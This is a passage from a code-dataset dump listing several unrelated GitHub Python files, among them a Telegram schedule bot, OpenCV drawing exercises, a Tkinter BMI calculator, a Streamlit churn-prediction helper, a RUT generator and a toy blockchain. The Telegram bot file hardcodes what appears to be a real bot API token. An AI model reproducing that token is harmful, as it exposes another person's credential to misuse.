{e}\")\n\n","repo_name":"AutoByteus/autobyteus","sub_path":"autobyteus/prompt/prompt_template.py","file_name":"prompt_template.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"17840235505","text":"import telebot\nbot = telebot.TeleBot('1723704255:AAEMH1m1C5r2WNrKfGkHpLUN_78lu3Yg_xs')\n\n@bot.message_handler(commands=['start', 'help'])\ndef send_welcome(message):\n bot.reply_to(message, f'Я бот-расписание и помогу тебе не опоздать на урок. Приятно познакомиться, {message.from_user.first_name}')\n\n@bot.message_handler(content_types=['text'])\ndef get_text_messages(message):\n if message.text.lower() == 'привет':\n bot.send_message(message.from_user.id, 'Привет!')\n else:\n bot.send_message(message.from_user.id, 'Не понимаю, что это значит.')\n\nbot.polling(none_stop=True)\n","repo_name":"natali-art/UchRasp","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40555429321","text":"import cv2 as cv\nimport numpy as np\n\nblank = np.zeros((500,500, 3), dtype='uint8')\n# cv.imshow('Blank', blank)\n\n# IMPORTANT COLOR IS = BGR\n\n# 1. Paint the image a certain color\n# blank[:] = 255, 255, 255\n# blank[200:300] = 0,0,255\n# blank[:,200:300] = 0,0,255\n# cv.imshow('England Flag', blank)\n\n# 2. Draw a Rectangle\n# source, sudut1, sudut2, warna, ketebalan\n# 0,50 = x=0 , y=50 \n# 250, 0 = x=250, y=0 \n# thikness = -1 (filled) atau 2\nprint(len(blank))\ncv.rectangle(blank, (0,0), (blank.shape[1]//2, blank.shape[0]//2), (0,255,255), thickness=-1)\ncv.rectangle(blank, (blank.shape[1]//2, blank.shape[0]//2), (blank.shape[1], blank.shape[0]), (0,255,255), thickness=-1)\n# cv.imshow('Rectangle', blank)\n\n\n# 3. Draw a Circle\n# source, center, radius, color, ketebalan\ncv.circle(blank, (250, 250), 40, (0,0,255), thickness=-1)\n# cv.imshow('Circle', blank)\n\n# 4. Draw a Line\ncv.line(blank, (0,500), (500,0), (255,255,255), thickness=5)\n# cv.imshow(\"Line\", blank)\n\n# 5. Draw Eclipse\n# src, center, axes, angle, startAngle, endAngle, color, thikness\ncv.ellipse(blank,(250,375),(100,50),0,0,180,(255,255,255),-1)\n\n\n# 6. Write a Text\n# src, text, titik mulai, font, font scale, color, thikness\ncv.putText(blank, \"Nuclear\", (145,125), cv.FONT_HERSHEY_TRIPLEX,1.5, (255,255,255), 3)\ncv.imshow(\"Text\", blank)\n\n\n\ncv.waitKey(0)\n","repo_name":"ToKu404/basic-open-cv","sub_path":"learn03_draw.py","file_name":"learn03_draw.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21573129676","text":"# Lawrence McAfee\n\n# ~~~~~~~~ import ~~~~~~~~\nfrom modules.node.HierNode import HierNode\nfrom modules.node.LeafNode import LeafNode\nfrom modules.node.Stage import Stage\nfrom modules.node.block.CodeBlock import CodeBlock as cbk\nfrom modules.node.block.ImageBlock import ImageBlock as ibk\nfrom modules.node.block.MarkdownBlock import MarkdownBlock as mbk\n\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nblocks = [\n mbk(\"The best hyperplane that linearly separates two classes is identified as the line lying at the largest margin from the nearest vectors at the boundary of the two classes.\"),\n mbk(\"In Figure 22-3, we observe that the best hyperplane is the line at the exact center of the two classes and constitutes the largest margin between both classes. Hence, this optimal hyperplane is also known as the largest margin classifier.\"),\n ibk(None, \"Figure 22-3. The largest margin classifier\"),\n mbk(\"The boundary points of the respective classes which are known as the support vectors are essential in finding the optimal hyperplane. The support vectors are illustrated in Figure 22-4. The boundary points are called support vectors because they are used to determine the maximum distance between the class they belong to and the discriminant function separating the classes.\"),\n ibk(None, \"Figure 22-4. Support vectors\"),\n mbk(\"The mathematical formulation for finding the margin and consequently the hyperplane that maximizes the margin is beyond the scope of this book, but suffice to say this technique involves the Lagrange multiplier.\"),\n]\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nclass Content(LeafNode):\n def __init__(self):\n super().__init__(\n \"Finding the Optimal Hyperplane\",\n Stage.REMOVE_EXTRANEOUS,\n Stage.ORIG_BLOCKS,\n # Stage.CUSTOM_BLOCKS,\n # Stage.ORIG_FIGURES,\n # Stage.CUSTOM_FIGURES,\n # Stage.CUSTOM_EXERCISES,\n )\n self.add(mbk(\"# Finding the Optimal Hyperplane\"))\n [self.add(a) for a in blocks]\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nclass Findingthe(HierNode):\n def __init__(self):\n super().__init__(\"Finding the Optimal Hyperplane\")\n self.add(Content())\n\n# eof\n","repo_name":"nimra/module_gen","sub_path":"nodes/Bisong19Building/E_PartIV/E_Chapter22/A_WhatIs/A_Findingthe/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21292742827","text":"from tkinter import *\n\ndef leftclickbutton(event):\n LableResalt.configure(text =int(textBoxWeight.get())//((float(textBoxHeight.get())/100)**2))\n Resalt = int(textBoxWeight.get())//((float(textBoxHeight.get())/100)**2)\n if int(Resalt) > 30:\n Labletotal.configure(text = \"อ้วนมาก\",bg='orange')\n elif int(Resalt) >= 25:\n Labletotal.configure(text = \"อ้วน\",bg='orange')\n elif int(Resalt) >= 23:\n Labletotal.configure(text=\"น้ำหนักเกิน\",bg='orange')\n elif int(Resalt) >= 18.6:\n Labletotal.configure(text=\"น้ำหนักปกติ เหมาะสม\",bg='orange')\n else:\n Labletotal.configure(text=\"ผอมเกินไป\",bg='orange')\n\nMainWindow = Tk()\nLableHeight = Label(MainWindow,text = \"ส่วนสูง (cm)\")\nLableHeight.grid(row=0,column=0)\n\ntextBoxHeight = Entry(MainWindow)\ntextBoxHeight.grid(row=0,column=1)\n\nLableWeight = Label(MainWindow,text = \"น้ำหนัก (Kg)\")\nLableWeight.grid(row=1,column=0)\n\ntextBoxWeight = Entry(MainWindow)\ntextBoxWeight.grid(row=1,column=1)\n\nCalculateButton = Button(MainWindow,text =\"คำนวณ\",bg='orange')\nCalculateButton.grid(row=2,column=0)\nCalculateButton.bind('', leftclickbutton)\n\nLableResalt = Label(MainWindow,text = \"ผลลัพธ์\")\nLableResalt.grid(row=2,column=1)\n\nLabletotal = Label(MainWindow)\nLabletotal.grid(row=3,column=1)\n\nMainWindow.mainloop()","repo_name":"MonkeyZ-04/Cp3_Nonthpawit_S","sub_path":"Exercise21.py","file_name":"Exercise21.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19444487036","text":"import pickle\nimport pandas as pd\nimport streamlit as st\n\n\n# encoding Gender\nwith open('../data/ML/pkl/encodingGender.pkl', 'rb') as gender:\n encoding_gender = pickle.load(gender)\n\n# encoding Multiple Lines \nwith open('../data/ML/pkl/encodingMultiple Lines.pkl', 'rb') as multiple_lines:\n encoding_multiple_lines = pickle.load(multiple_lines)\n\n# encoding Streaming TV \nwith open('../data/ML/pkl/encodingStreaming TV.pkl', 'rb') as streaming_tv:\n encoding_streaming_tv = pickle.load(streaming_tv)\n\n# encoding Streaming Movies\nwith open('../data/ML/pkl/encodingStreaming Movies.pkl', 'rb') as streaming_movies:\n encoding_streaming_movies = pickle.load(streaming_movies)\n\n# encoding Streaming Music\nwith open('../data/ML/pkl/encodingStreaming Music.pkl', 'rb') as streaming_music:\n encoding_streaming_music = pickle.load(streaming_music)\n\n# encoding Device Protection \nwith open('../data/ML/pkl/encodingDevice Protection Plan.pkl', 'rb') as protection:\n encoding_protection = pickle.load(protection)\n\n# encoding Internet Type\nwith open('../data/ML/pkl/encodingInternet Type.pkl', 'rb') as internet_type:\n encoding_internet_type = pickle.load(internet_type)\n\n#encoding Married\nwith open('../data/ML/pkl/encodingMarried.pkl', 'rb') as married:\n encoding_married = pickle.load(married)\n\n#encoding Online Backup\nwith open('../data/ML/pkl/encodingOnline Backup.pkl', 'rb') as online_backup:\n encoding_online_backup = pickle.load(online_backup)\n\n#encoding Online Security\nwith open('../data/ML/pkl/encodingOnline Security.pkl', 'rb') as online_security:\n encoding_online_security = pickle.load(online_security)\n\n#encoding Paperless Billing\nwith open('../data/ML/pkl/encodingPaperless Billing.pkl', 'rb') as paperless:\n encoding_paperless = pickle.load(paperless)\n\n#encoding Payment Method\nwith open('../data/ML/pkl/encodingPayment Method.pkl', 'rb') as payment:\n encoding_payment_method= pickle.load(payment)\n\n#encoding Premium Tech Support \nwith open('../data/ML/pkl/encodingPremium Tech Support.pkl', 'rb') as premium_support:\n encoding_premium_support = pickle.load(premium_support)\n\n#encoding Unlimited Data\nwith open('../data/ML/pkl/encodingUnlimited Data.pkl','rb') as unlimited_data:\n encoding_unlimited_data = pickle.load(unlimited_data)\n\n#encoding Phone Service \nwith open('../data/ML/pkl/encodingPhone Service.pkl','rb') as phone_service:\n encoding_phone_service = pickle.load(phone_service)\n\n# encoding map \n\n# encoding Contract\n\nmap_contract = {\"Month-to-Month\": 1, \n \"One Year\": 0, \"Two Year\":0}\n\n# encoding Offer\nmap_offer = {\"Offer A\": 0, \"Offer B\": 1,\"Offer C\":1,\"Offer D\":2,\"Offer E\":3, \"None\":4}\n\n\n\n# Best Model \n\nwith open('../data/ML/pkl/mejor_modelo.pkl', 'rb') as modelo:\n modelo = pickle.load(modelo)\n\n\n\n\n# We define functions to predict my churn probability\n\ndef user_input_features():\n # encoding \n married_ = st.selectbox('Married',(\"Yes\",\"No\") ) \n Phone_Service_ = st.selectbox('Phone Service', (\"Yes\",\"No\")) \n Internet_Type_ = st.selectbox('Internet Type', (\"Fiber Optic\",\"DSL\",\"None\",\"Cable\")) \n Online_Security_ = st.selectbox('Online Security', (\"Yes\",\"No\")) \n Online_Backup_ = st.selectbox('Online Backup', (\"Yes\",\"No\")) \n Devive_protection_plan_ = st.selectbox('Device Protection Plan', (\"No\",\"Yes\")) \n Premium_Tech_Support_ = st.selectbox('Premium Tech Support', (\"Yes\",\"No\")) \n Unlimited_Data_ = st.selectbox('Unlimited Data', (\"No\",\"Yes\")) \n Paperless_Billing_ = st.selectbox('Paperless Billing', (\"Yes\",\"No\")) \n Payment_Method_ = st.selectbox('Payment Method', (\"Credit Card\",\"Mailed Check\",\"Bank Withdrawal\" ))\n Gender_ = st.selectbox('Gender', (\"Female\",\"Male\"))\n Multiple_Lines_ = st.selectbox('Multiple Lines', (\"Yes\",\"No\"))\n Streaming_TV_ = st.selectbox('Streaming TV',(\"Yes\",\"No\"))\n Streaming_Music_ = st.selectbox('Streaming Music', (\"Yes\",\"No\"))\n Streaming_Movies_ = st.selectbox('Streaming Movies', (\"Yes\",\"No\"))\n Contract_ = st.selectbox('Contract', (\"One Year\",\"Two Year\",\"Month-to-Month\"))\n Offer_ = st.selectbox('Offer', (\"None\",\"Offer A\",\"Offer B\",\"Offer C\",\"Offer D\",\"Offer E\"))\n\n #numeric \n\n Age_ = st.sidebar.slider('Age', 18,80,45)\n Number_of_Dependents = st.sidebar.slider('Number of Dependents', 0,10,2)\n Number_of_Referrals = st.sidebar.slider('Number of Referrals', 0,15,0)\n Avg_Monthly_GB_Download = st.sidebar.slider('Avg Monthly GB Download', 0,100,17)\n Total_Revenue = st.sidebar.slider('Total Revenue', 20, 15000,10000)\n Satisfaction_Score = st.sidebar.slider('Satisfaction Score',1,5,2)\n CLTV = st.sidebar.slider('CLTV',2000,7000, 5337)\n \n\n data = {'Married': married_,\n 'Phone Service': Phone_Service_,\n 'Internet Type': Internet_Type_,\n 'Online Security': Online_Security_,\n 'Online Backup': Online_Backup_,\n 'Device Protection Plan': Devive_protection_plan_,\n 'Premium Tech Support': Premium_Tech_Support_,\n 'Unlimited Data': Unlimited_Data_,\n 'Paperless Billing': Paperless_Billing_,\n 'Payment Method': Payment_Method_,\n 'Gender': Gender_,\n 'Multiple Lines': Multiple_Lines_,\n 'Streaming TV': Streaming_TV_,\n 'Streaming Music': Streaming_Music_,\n 'Streaming Movies': Streaming_Movies_,\n 'Contract': Contract_,\n 'Offer': Offer_,\n \n 'Age': Age_,\n 'Number of Dependents': Number_of_Dependents,\n 'Number of Referrals': Number_of_Referrals,\n 'Avg Monthly GB Download': Avg_Monthly_GB_Download,\n 'Total Revenue': Total_Revenue,\n 'Satisfaction Score': Satisfaction_Score,\n 'CLTV': CLTV,\n }\n\n return pd.DataFrame(data, index=[0])\n\n\n\ndef prediction_churn (user_dataframe, modelo):\n predic = modelo.predict(user_dataframe)[0]\n \n prob = modelo.predict_proba(user_dataframe)\n \n return predic, prob","repo_name":"luceromendozab/Churn_Project","sub_path":"streamlit/src/soporte.py","file_name":"soporte.py","file_ext":"py","file_size_in_byte":5995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13630197213","text":"import random\nfrom faker import Faker\nfrom rut_chile import rut_chile\nfrom constants import RUT_LOWER_RANGE, RUT_UPPER_RANGE, ACCOUNT_NUMBER_LOWER_RANGE, ACCOUNT_NUMBER_UPPER_RANGE, BANK_NAMES, ACCOUNT_TYPES, BOOLEANS\n\n\nclass Generate:\n @staticmethod\n def rut(with_dots=False) -> str:\n rut_number = str(random.randint(RUT_LOWER_RANGE, RUT_UPPER_RANGE))\n verificatior_digit = rut_chile.get_verification_digit(rut_number)\n return rut_chile.format_rut('{}{}'.format(rut_number, verificatior_digit), with_dots=with_dots)\n\n @staticmethod\n def account_number(account_type: str, rut: str) -> str:\n if account_type == 'Cuenta rut':\n display = random.choice(BOOLEANS)\n if display:\n return rut[:-2]\n else:\n return ''\n return str(random.randint(ACCOUNT_NUMBER_LOWER_RANGE, ACCOUNT_NUMBER_UPPER_RANGE))\n\n @staticmethod\n def bank_name() -> str:\n return random.choice(BANK_NAMES)\n\n @staticmethod\n def account_type() -> str:\n return random.choice(ACCOUNT_TYPES)\n","repo_name":"pahaeussler/getMyTransferInfo","sub_path":"generateData/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29923508291","text":"import argparse\nimport csv\nimport json\nimport os\nimport sys\nimport time\nfrom multiprocessing import Pool\n\nimport numpy as np\n\nsys.path.append('..')\nfrom src.global_constants_and_functions import is_float, str_to_float_or_int\n\n\ndef get_pairs_of_factors_from_autoplot_csv(filename):\n with open(filename, mode='r', encoding='utf-8') as f:\n csv_reader = csv.reader(f, delimiter=';')\n pairs_of_factor = [i[:2] for i in csv_reader][1:]\n # print(pairs_of_factor)\n return pairs_of_factor\n\n\ndef get_data_from_csv(filename):\n with open(filename, mode='r', encoding='utf-8') as f:\n csv_reader = list(csv.reader(f, delimiter=';'))\n # print(csv_reader)\n # print({i[0]: i[1:] for i in zip(*csv_reader)})\n return {i[0]: tuple([j for j in i[1:]]) for i in zip(*csv_reader)}\n\n\ndef combine_pairs_of_factors(data_from_autoplot, data_from_data_csv):\n \"\"\"\n :param data_from_autoplot: result of get_pairs_of_factors_from_autoplot_csv\n :param data_from_data_csv: result of get_data_from_boundaries_csv\n :return: {'factor1+factor2':[(valuex1,valuey1),(valuex2, valuey2)...]}\n \"\"\"\n result_dict = {}\n for i in data_from_autoplot:\n key = '{}+{}'.format(i[0], i[1])\n x_factor = data_from_data_csv[i[0]]\n y_factor = data_from_data_csv[i[1]]\n # print(x_factor)\n # print(y_factor)\n # remove na and nans:\n # print(str_to_float_or_int(i[1]))\n result_dict[key] = [[(str_to_float_or_int(j[0])), str_to_float_or_int(j[1])] for j in\n list(zip(x_factor, y_factor)) if\n is_float(j[0]) and is_float(j[1])]\n # print(result_dict)\n return result_dict\n\n\ndef get_intervals_from_boundaries(data_from_boundaries_csv, wanted_factor_on_x_axis):\n numbers_of_buckets = data_from_boundaries_csv['']\n interval_borders = data_from_boundaries_csv[wanted_factor_on_x_axis]\n return [[int(i[0]), str_to_float_or_int(i[1])] for i in zip(numbers_of_buckets, interval_borders) if\n is_float(i[0]) and is_float(i[1])]\n\n\ndef split_into_intervals(combined_pair_of_factors, intervals, wanted_factor_pair):\n # print(combined_pair_of_factors[wanted_factor_pair])\n # print(intervals)\n # print(combined_pair_of_factors)\n # x_vals = [i[0] for i in combined_pair_of_factors[wanted_factor_pair]]\n # print('combined pairs are:')\n # print(wanted_factor_pair)\n # print(combined_pair_of_factors)\n # print(combined_pair_of_factors[wanted_factor_pair])\n # y_vals = [i[1] for i in combined_pair_of_factors[wanted_factor_pair]]\n x_vals = [i[0] for i in combined_pair_of_factors]\n y_vals = [i[1] for i in combined_pair_of_factors]\n # print(x_vals)\n # print(y_vals)\n max_x = max(x_vals)\n min_x = min(x_vals)\n\n factors_splitted_into_bins = [[] for i in range(0, len(intervals))]\n borders = [i[1] for i in intervals]\n borders_for_digitizing = np.array(borders)\n borders = [str_to_float_or_int(i[1]) for i in intervals]\n bucket_numbers = [i[0] for i in intervals]\n x_vals_np_array = np.array(x_vals)\n # print(x_vals_np_array)\n indices = np.digitize([i for i in x_vals_np_array], borders_for_digitizing, right=False)\n # print(indices)\n # print(x_vals)\n # print(combined_pair_of_factors)\n # print(x_vals_np_array)\n # print(borders)\n # print(intervals)\n # print(min(indices))\n # print(max(indices))\n len(factors_splitted_into_bins)\n # sys.exit()\n for i in range(0, len(indices)):\n factors_splitted_into_bins[indices[i] - 1].append([x_vals[i], y_vals[i]])\n # print(factors_splitted_into_bins)\n # print(bucket_numbers)\n # print(borders)\n return list(factors_splitted_into_bins), bucket_numbers, list(borders), min_x, max_x, min(y_vals), max(y_vals), len(\n x_vals)\n\n\ndef compute_data_for_interval(pairs_of_values_in_interval, bucket_number, border_low, border_high,\n is_highest_bucket=False, is_lowest_bucket=True):\n # if bucket is empty\n # print(pairs_of_values_in_interval)\n\n # basic bucket - returned if bucket is empty\n bucket = {\n \"BucketOrdinalNumber\": bucket_number,\n \"StructureCountInBucket\": len(pairs_of_values_in_interval),\n \"XfactorFrom\": {\n \"XfactorFromIsInfinity\": False,\n \"XfactorFromOpenInterval\": False,\n \"XfactorFromValue\": None\n },\n \"XfactorTo\": {\n \"XfactorToIsInfinity\": False,\n \"XfactorToOpenInterval\": not is_highest_bucket,\n \"XfactorToValue\": None\n },\n \"YfactorAverage\": None,\n \"YfactorHighQuartile\": None,\n \"YfactorLowQuartile\": None,\n \"YfactorMaximum\": None,\n \"YfactorMedian\": None,\n \"YfactorMinimum\": None\n }\n\n if pairs_of_values_in_interval:\n x_factor = [i[0] for i in pairs_of_values_in_interval]\n y_factor = [i[1] for i in pairs_of_values_in_interval]\n if is_lowest_bucket:\n if min(x_factor) <= border_low:\n bucket[\"XfactorFrom\"][\"XfactorFromValue\"] = min(x_factor)\n bucket[\"XfactorTo\"][\"XfactorToValue\"] = border_high\n elif is_highest_bucket:\n bucket[\"XfactorFrom\"][\"XfactorFromValue\"] = border_low\n if max(x_factor) >= border_high:\n bucket[\"XfactorTo\"][\"XfactorToValue\"] = max(x_factor)\n else:\n bucket[\"XfactorFrom\"][\"XfactorFromValue\"] = border_low\n bucket[\"XfactorTo\"][\"XfactorToValue\"] = border_high\n bucket[\"YfactorAverage\"] = np.average(y_factor)\n bucket[\"YfactorHighQuartile\"] = np.quantile(y_factor, 0.75)\n bucket[\"YfactorLowQuartile\"] = np.quantile(y_factor, 0.25)\n bucket[\"YfactorMaximum\"] = max(y_factor)\n bucket[\"YfactorMedian\"] = np.median(y_factor)\n bucket[\"YfactorMinimum\"] = min(y_factor)\n\n if is_lowest_bucket:\n bucket[\"XfactorFrom\"][\"XfactorFromValue\"] = min(x_factor)\n if is_highest_bucket:\n bucket[\"XfactorTo\"][\"XfactorToValue\"] = max(x_factor)\n\n return bucket\n\n\ndef create_json(filename, folder, dictionary_to_output):\n with open(os.path.join(folder, filename), mode='w+', encoding='utf-8') as json_file:\n json.dump(dictionary_to_output, json_file, indent=4)\n\n\ndef get_name_translations(filename):\n with open(filename, encoding='utf-8') as f:\n nametranslation_list_of_dicts = json.load(f)\n return nametranslation_list_of_dicts\n\n\ndef get_familiar_name(nametranslation_list_of_dicts, factor_id):\n for i in nametranslation_list_of_dicts:\n if i['ID'].lower() == factor_id.lower():\n return i['FamiliarName']\n return factor_id\n\n\ndef create_json_for_pair(key, value, data_from_boundaries, result_folder, nametranslations_json):\n nametranslations_list_of_dicts = get_name_translations(nametranslations_json)\n try:\n # print(key.split('+')[0])\n # print(data_from_boundaries)\n intervals = get_intervals_from_boundaries(data_from_boundaries, key.split('+')[0])\n factors_splitted_into_bins, bucket_numbers, borders, min_x, max_x, min_y, max_y, length = split_into_intervals(\n value, intervals, key)\n result_dict = {'GraphBuckets': [],\n 'StructureCount': length,\n 'XfactorGlobalMaximum': max_x,\n 'XfactorGlobalMinimum': min_x,\n 'XfactorName': get_familiar_name(nametranslations_list_of_dicts, key.split('+')[0]),\n 'YfactorGlobalMaximum': max_y,\n 'YfactorGlobalMinimum': min_y,\n 'YfactorName': get_familiar_name(nametranslations_list_of_dicts, key.split('+')[1])\n }\n j = 1\n last_bucket = False\n k = 0\n first_bucket = True\n for pair, number in zip(factors_splitted_into_bins, bucket_numbers):\n if j == len(factors_splitted_into_bins):\n last_bucket = True\n if k > 0:\n first_bucket = False\n border_low = borders[k]\n try:\n border_high = borders[k + 1]\n except IndexError:\n border_high = 0 # does not matter\n result_dict['GraphBuckets'].append(\n compute_data_for_interval(pair, number, border_low, border_high, last_bucket, first_bucket))\n j += 1\n k += 1\n create_json(key + '.json', result_folder, result_dict)\n except Exception as e:\n print('Unable to create json for pair {}'.format(str(key)))\n print(str(e))\n\n\ndef get_results(filename_autoplots, filename_boundaries, filename_data_csv, result_folder, nametranslations_json,\n cpu_cores_count=1):\n pairs_of_factors = get_pairs_of_factors_from_autoplot_csv(filename_autoplots)\n data_from_boundaries = get_data_from_csv(filename_boundaries)\n data_from_data_csv = get_data_from_csv(filename_data_csv)\n # intervals = data_from_boundaries\n combined_pairs_of_factors_with_key = combine_pairs_of_factors(pairs_of_factors, data_from_data_csv)\n # for key, value in combined_pairs_of_factors_with_key.items():\n # create_json_for_pair(key, value, data_from_boundaries, result_folder)\n # parallel:\n pool = Pool(cpu_cores_count)\n arguments_for_create_json = [list(i) + [data_from_boundaries] + [result_folder] + [nametranslations_json] for i in\n list(combined_pairs_of_factors_with_key.items())]\n pool.starmap_async(create_json_for_pair, arguments_for_create_json).get()\n pool.close()\n pool.join()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Script for generating .json file for charts')\n parser.add_argument('filename_autoplots', help='ususally autoplot.csv file', type=str)\n parser.add_argument('filename_boundaries', help='usually boundaries.csv file', type=str)\n parser.add_argument('filename_data_csv', help='usually data.csv file', type=str)\n parser.add_argument('result_folder',\n help='Folder for result. Keep in mind, that existing files will be overwritten', type=str)\n parser.add_argument('nametranslations_json',\n help='Json file (e.g. available on ValTrends db download page), '\n 'that translates factor ID to human readable factor description',\n type=str)\n parser.add_argument('--cpu_count', '-c', nargs='?', const=1, default=1, help='Cpu count',\n type=int)\n args = parser.parse_args()\n start = time.time()\n get_results(args.filename_autoplots, args.filename_boundaries, args.filename_data_csv, args.result_folder,\n args.nametranslations_json,\n args.cpu_count)\n end = time.time()\n print(\"Computing data and creating json files lasted {:.3f} seconds\".format(end - start))\n","repo_name":"pali08/dipl_thesis","sub_path":"src/exe_get_json_precomputed_charts.py","file_name":"exe_get_json_precomputed_charts.py","file_ext":"py","file_size_in_byte":10905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39543341206","text":"# unit_test.py\n\nfrom os.path import exists\nfrom files import read_csv, read_file, write_csv, write_file\n\ndef test_user(user):\n try:\n test_name(user)\n try:\n test_email(user)\n print(user.name() + \" was successully checked!\")\n except AssertionError:\n print(\"User: \" + user.name() +\" doesn't have an email!\")\n except AssertionError:\n print(\"User doesn't have a name!\")\n \n \ndef test_create():\n user = create_user('Nik','Jones','jone2032@bears.unco.edu')\n #print(user.firstname)\n #return user\n #assert(user.email in locals())\n assert('user' in locals()) ## <<< is this actually checking the existance of object user or a string \"user\"?\n #assert(user not in locals()) \n\ndef test_create_multiple():\n user1 = create_user('Nik','Jones','jone2032@bears.unco.edu')\n user2 = create_user('Bobby','Hermsmeyer','herm1004@bears.unco.edu')\n user3 = create_user('Jake','Loki','loki7156@bears.unco.edu')\n user4 = create_user('David','Voss','voss5834@bears.unco.edu')\n user5 = create_user('Sid','Campe','camp6969@bears.unco.edu')\n users = [['Nik','Jones','jone2032@bears.unco.edu'],['Bobby','Hermsmeyer','herm1004@bears.unco.edu'],['Jake','Loki','loki7156@bears.unco.edu'],['David','Voss','voss5834@bears.unco.edu'],['Sid','Campe','camp6969@bears.unco.edu'],['','',''],['a','b','']]\n write_csv('users.csv',users)\n\nclass User():\n firstname = \"\"\n lastname = \"\"\n email = \"\"\n\n def __init__(self, fname, lname, email):\n self.firstname = fname\n self.lastname = lname\n self.email = email\n \n def name(self):\n name = self.firstname + ' ' + self.lastname\n assert(name != \" \")\n return name\n\ndef create_user(fname, lname, email):\n user = User(fname,lname,email)\n return user\n\ndef test_name(user):\n test = user.name()\n answer = user.firstname + ' ' + user.lastname\n assert(test == answer)\n #assert(test != answer)\n\ndef test_email(user):\n answer = user.email\n assert(answer != \"\")\n #assert(answer == \"\")\n \n\ndef test_all_users_from(path):\n #if(path.exists):\n users = read_csv(path)\n for i in users:\n fname = i[0]\n lname = i[1]\n email = i[2]\n newUser = create_user(fname,lname,email)\n test_user(newUser)\n \n\nif __name__ == \"__main__\":\n test_create()\n test_create_multiple()\n test_all_users_from('users.csv')\n\n ## confusion on the try catch\n ## are we removing the asserts and replacing with returns of false?\n ## not entirely sure how this should look\n\n","repo_name":"UNC-CS350/CS350","sub_path":"Exercises/Results/jone2032/unit_test.py","file_name":"unit_test.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42904485359","text":"\"\"\" timestamp examples from python do not include how to remove seconds and microseconds. found example on stackoverflow: https://stackoverflow.com/questions/3183707/stripping-off-the-seconds-in-datetime-python/3183720 \"\"\"\n\nimport hashlib\nfrom datetime import datetime\n\nclass Block:\n\n def __init__(self, timestamp, data, previous_hash=None):\n self.timestamp = self.__createTimeStamp(timestamp)\n self.data = data\n self.previous_hash = previous_hash\n self.hash = self.__calc_hash(timestamp,data)\n self.prev = None\n self.next = None\n\n\n def __createTimeStamp(self, currentTime):\n now_time = currentTime.replace(second=0, microsecond=0)\n return now_time\n\n def __calc_hash(self, timestamp, data):\n sha = hashlib.sha256()\n hash_str = data.encode('utf-8')\n hash_str += str(timestamp).encode('utf-8')\n sha.update(hash_str)\n\n return sha.hexdigest()\n \n\nclass BlockChain:\n def __init__(self, block=None):\n self.first = None\n self.last = None\n\n def addBlock(self, blockdata):\n head = self.first\n tail = self.last\n\n if head == None:\n new_block = Block(datetime.now(), blockdata)\n self.first = new_block\n self.last = new_block\n else:\n new_block = Block(datetime.now(), blockdata, tail.hash)\n tail.next = new_block\n new_block.prev = tail\n self.last = new_block\n \n def append(self, block):\n head = self.first\n tail = self.last\n\n if head == None:\n self.first = block\n self.last = block\n else:\n tail.next = block\n block.prev = tail\n block.previous_hash = tail.hash\n self.tail = block\n\n \n\ndata_to_hash = \"This is the data to hash\"\nstartBlock = Block(datetime.now(),data_to_hash, 0)\n\nchain1 = BlockChain()\nchain1.append(startBlock)\nprint(\"first test case\")\nprint(chain1)\nprint(chain1.first)\nchain1.addBlock(\"Hash me please\")\nprint(chain1.last)\n\nprint(\"second test case\")\nchain2 = BlockChain()\nprint(chain2)\nprint(chain2.first)\n\nprint(\"third test case\")\nblock3_test1 = Block(datetime.now(),data_to_hash)\nprint(block3_test1.timestamp)\nblock3_test2 = Block(datetime.now(),\"Third test case for same timestamp\")\nprint(block3_test2.timestamp)\nchain3 = BlockChain()\nchain3.append(block3_test1)\nchain3.append(block3_test2)\n","repo_name":"reaprman/Data-Struct-algo-nanodegree","sub_path":"proj2/problem5.py","file_name":"problem5.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34103666076","text":"if __name__ == \"__main__\":\n\n \"\"\" Replacement for pyspark.shell \"\"\"\n\n import pyspark\n from pyspark.sql import SparkSession\n\n spark: SparkSession = SparkSession.builder.enableHiveSupport().getOrCreate()\n sc: pyspark.SparkContext = spark.sparkContext\n\n print(sc.getConf().getAll())\n df = spark.createDataFrame(\n [\n (1, \"foo\"), # create your data here, be consistent in the types.\n (2, \"bar\"),\n ],\n [\"id\", \"label\"] # add your column names here\n )\n df = spark.sql(\"select * from play_data.test_shubham\")\n df.show()\n","repo_name":"joshi95/Delta-Spark-On-Kubernetes","sub_path":"example/example-task.py","file_name":"example-task.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"29607818049","text":"import pytest\n\nfrom homework07.hw3 import tic_tac_toe_checker\n\ntest_data = [\n 